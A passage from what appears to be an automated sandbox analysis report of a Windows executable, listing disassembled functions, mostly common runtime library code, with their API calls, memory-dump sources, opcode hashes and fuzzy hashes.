                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1424318461-0
                                                                                                                                                                                                                                                  • Opcode ID: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                                                                                                  • Instruction ID: 22d7f7f69cf39c90cfcec02d88a68a9c1fa73a787f58570ac840598d7a3d1efd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d50cebf28726a5f85ba3531a31a58a8268f4a41b365b0e6330d24c92f64b898
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9819E71E006099FDB14DFA8D985BAEBBB5FB48320F244229E925F73D0D770B9409B94
                                                                                                                                                                                                                                                  Function 00F5266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00F526F8
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52786
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F527B0
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F527F8
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F52812
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F52838
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F52875
                                                                                                                                                                                                                                                  • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00F52892
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3603178046-0
                                                                                                                                                                                                                                                  • Opcode ID: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                                                                                                  • Instruction ID: 3e72a4db479708860f5deb3043dc3c92a3b20532f8d16fca13cf0b3ea7bbddd7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41815f00caec4df7c0ceef6d834fa6dac2c76abdeb990b399e5b06147be6c4a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E71A732D002099FDF619FA4DC85AEE7BB5EF4B362F18021AEE04A7151D735C848E760
                                                                                                                                                                                                                                                  Function 00F5215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00F521A3
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F521CF
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00F5220E
                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5222B
                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00F5226A
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00F52287
                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F522C9
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F522EC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2040435927-0
                                                                                                                                                                                                                                                  • Opcode ID: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                                                                                                  • Instruction ID: 3744f145cd87e835538b775c13bbe67b4f70199aaa94301ab7e04887710d0381
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba7c51b99db859c3d4872e5d9ec73d2034f5f003da4509e5b5c8052c093caf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C951C37290020AAFEB605F64CC45FAF7BA9EF46752F114228FF15E6150D734CD18ABA0
                                                                                                                                                                                                                                                  Function 00F38610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000044,00000000,80A20388,?,00000000), ref: 00F386F9
                                                                                                                                                                                                                                                  • __Getctype.LIBCPMT ref: 00F3877B
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F387E4
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2372200979-0
                                                                                                                                                                                                                                                  • Opcode ID: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                                                                                                  • Instruction ID: b5f8295f726968265ab1a5141a1f251ef31af0b8b19667028acd7231cf5040b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e412937406b567245955892ba4bc41f919361d08fea8fc47f2e0d5182200ee2b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3861C471C00748DFDB11CF68C9407AABBF0EF14364F148159E845AB291EB78AE45EB91
                                                                                                                                                                                                                                                  Function 00F39270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000018,00000000,80A20388,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00F39342
                                                                                                                                                                                                                                                  • __Getctype.LIBCPMT ref: 00F393BD
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F393F8
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2372200979-0
                                                                                                                                                                                                                                                  • Opcode ID: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                                                                                                  • Instruction ID: 6618cf343641e494afb155895f4482d801b8f96dd2edf06979c0a09ab6a6c6c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51BFB1D08209DFCB11DF68C844BAEBBF4EF14724F148159E845AB391D7B4AA40EB91
                                                                                                                                                                                                                                                  Function 00F53F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00F53F57
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00F53F5F
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00F53FE8
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00F54013
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00F54068
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: e38439e54a571c2cd459715d25be6fd08a20cbfd3ad1604325e6aa960382e941
                                                                                                                                                                                                                                                  • Instruction ID: 814cd7268e443e15c7665551f43c262e63006fdeb269ef018756dbd38fd1b704
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38439e54a571c2cd459715d25be6fd08a20cbfd3ad1604325e6aa960382e941
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A41D234E002089BCF14DF68CC81A9EBBF1AF44369F148055EE189B392D735EA09EB91
                                                                                                                                                                                                                                                  Function 00F672FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00F67408,00F63841,0000000C,?,00000000,00000000,?,00F67632,00000021,FlsSetValue,00F7BD58,00F7BD60,?), ref: 00F673BC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                  • Opcode ID: 743fad180085bbacbf23ed7674b5e45bb9f9bb7362fecd1554addb464e8b9a18
                                                                                                                                                                                                                                                  • Instruction ID: ef0101cda76669dfcb32864a13f60a694fb526ea2891959d59f69cdc6c5c512b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 743fad180085bbacbf23ed7674b5e45bb9f9bb7362fecd1554addb464e8b9a18
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A21E436F09315EBCB21BB64AC42A6A37699F42774F240220FD19A7390E771ED00F6E1
                                                                                                                                                                                                                                                  Function 00F3B500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B531
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B54F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B577
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,0000000C,00000000,80A20388,?,00000000,00000000), ref: 00F3B5CF
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3B6B7
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B6E1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3931714976-0
                                                                                                                                                                                                                                                  • Opcode ID: b5fe0ed3c1611289dc3c9293e1fe279f5ffc608c62d22a98929317ef92888825
                                                                                                                                                                                                                                                  • Instruction ID: 77112ad6296edc56383222f9934aaea0c32d155d789dfab2376c0d5d6a3eab32
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5fe0ed3c1611289dc3c9293e1fe279f5ffc608c62d22a98929317ef92888825
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651E471D00209DFDB11CF58C8917AEBBB4FF10324F24819DE915AB392D7B59A04EB81
                                                                                                                                                                                                                                                  Function 00F3B700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B731
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B74F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B777
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000008,00000000,80A20388,?,00000000,00000000), ref: 00F3B7CF
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3B863
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B88D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3931714976-0
                                                                                                                                                                                                                                                  • Opcode ID: bad4c0e36179b790948b34e9408b8c2b0b0fca9d2f57277b73db527f489ebb89
                                                                                                                                                                                                                                                  • Instruction ID: 91a179bfc241765a0b0ee217260ffcf3198f4a89abcfdc766b3475b8e980bc91
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bad4c0e36179b790948b34e9408b8c2b0b0fca9d2f57277b73db527f489ebb89
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51AC71D04218DFCB11CF58C8A4BAEBBB4EF54720F24855DE905AB381D7B4AE01EB81
                                                                                                                                                                                                                                                  Function 00F60351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                  • String ID: a/p$am/pm
                                                                                                                                                                                                                                                  • API String ID: 3509577899-3206640213
                                                                                                                                                                                                                                                  • Opcode ID: e5399c4d66ba79c7e88c5372bbc951644db91d40846360661ef5834ec624c7b2
                                                                                                                                                                                                                                                  • Instruction ID: 43d1f6785de71ca804df4906971ed583ed0c45a443d223347802c22fdeb547fc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5399c4d66ba79c7e88c5372bbc951644db91d40846360661ef5834ec624c7b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAC1DD35D00206DACB24DF68C989BBB77B0EF45320F384049E906AB251DB36AD41FF61
                                                                                                                                                                                                                                                  Function 00F55978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00F5596F,00F54900,00F5358F), ref: 00F55986
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F55994
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F559AD
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00F5596F,00F54900,00F5358F), ref: 00F559FF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                  • Opcode ID: 1ef0bb51727aeac640705790d81fcfcd217f00bbb0c7bf2fdc7fc92595e6ed2f
                                                                                                                                                                                                                                                  • Instruction ID: 03c541456d5b2602a5a7c4e9c630a219c1aaf4f9358ca113f0534a644c7ffd38
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ef0bb51727aeac640705790d81fcfcd217f00bbb0c7bf2fdc7fc92595e6ed2f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E901B533609B15EFA62527747C95AAA3754DB01BB77300329FE24D51F1EE294C4972D0
                                                                                                                                                                                                                                                  Function 00F33230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,URL,00000000,?,80A20388,?,00000004), ref: 00F33294
                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,00000000), ref: 00F3354A
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00F33592
                                                                                                                                                                                                                                                    • Part of subcall function 00F31A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00F31AF7
                                                                                                                                                                                                                                                    • Part of subcall function 00F31A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00F31B7D
                                                                                                                                                                                                                                                    • Part of subcall function 00F32E60: LocalFree.KERNEL32(?,80A20388,?,?,00F73C40,000000FF,?,00F31242,80A20388,?,?,00F73C75,000000FF), ref: 00F32EB1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                                                                                                  • String ID: URL$url
                                                                                                                                                                                                                                                  • API String ID: 853893950-346267919
                                                                                                                                                                                                                                                  • Opcode ID: 12eb6d35fef01d2d23bb50fbc5d798933827724b78496beba04d082c6c328ba5
                                                                                                                                                                                                                                                  • Instruction ID: affc23e497d4905a031731b150cb2eb7b51ab3108f5b436aba7fe9f1fc5432e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12eb6d35fef01d2d23bb50fbc5d798933827724b78496beba04d082c6c328ba5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BC17570D14268DADB24DF28CC98BDDBBB4BF14314F1042D9D009A7291EBB96B88DF91
                                                                                                                                                                                                                                                  Function 00F336D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00F74215,000000FF), ref: 00F3381A
                                                                                                                                                                                                                                                    • Part of subcall function 00F32310: GetProcessHeap.KERNEL32 ref: 00F32365
